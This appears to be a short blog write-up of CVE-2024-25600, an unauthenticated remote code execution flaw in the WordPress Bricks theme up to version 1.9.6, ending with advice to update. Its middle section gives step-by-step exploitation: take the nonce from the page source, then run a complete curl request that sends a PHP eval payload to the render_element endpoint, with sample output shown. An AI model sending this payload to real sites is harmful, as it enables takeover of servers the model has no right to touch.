CVE-2024-25600 - WordPress - Bricks Theme - Unauthenticated RCE

I had totally missed this nasty bug when it came out earlier this year, and only became aware very recently after seeing this tweet on X. CVE-2024-25600 is an easy to exploit unauthenticated RCE that still affects installations of WordPress that have the Bricks Theme/Add-on installed with a version <= 1.9.6. I call it a theme since it's installed like a theme, but it's essentially an add-on to help make better posts and pages.

The vulnerability is due to an eval accepting unsanitized input from an attacker, and this happens when a specific JSON payload is sent to /bricks/v1/render_element whilst unauthenticated. If successfully exploited, the command will be run and the output of the command will be shown as part of an exception returned in the response. For an in-depth writeup detailing in way more detail, read this blog post.

The exploitation steps are simple:

  • Locate an installation with Bricks running <= 1.9.6
  • Grab the nonce from the main page. It's easy to find with view source.
  • Create a cURL request like the below to the server, replacing [HOST] and [NONCE] with the correct values..
curl -k -X POST "http://[HOST]/index.php?rest_route=/bricks/v1/render_element" \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "code",
    "settings": {
      "executeCode": "true",
      "code": "<?php throw new Exception(`id`);?>"
    }
  }
}'
  • If successful, you will see an output something like this:

{"data":{"html":"Exception: uid=33(www-data) groups=33(www-data)\n"}}

There was a small hiccup for me and this was finding the correct payload. The Chocapikk repo for this exploit provides 4 different payloads, mine happened to be the fourth, so it may require a few attempts to get this working.

Below is a video showing the exploit against an environment I setup for testing this:

A very nasty vulnerability. If you're affected, update Bricks ASAP as it is found on most common vulnerability scanners.

Resources used:

GitHub - Chocapikk/CVE-2024-25600: Unauthenticated Remote Code Execution – Bricks <= 1.9.6
Unauthenticated Remote Code Execution – Bricks <= 1.9.6 - Chocapikk/CVE-2024-25600
Unauthenticated Remote Code Execution – Bricks <= 1.9.6 – snicco
Affected plugin Bricks Builder Active installs Commercial ~ 25000 Vulnerable version <= 1.9.6 Audited version 1.9.6 Fully patched version 1.9.6.1 Recommended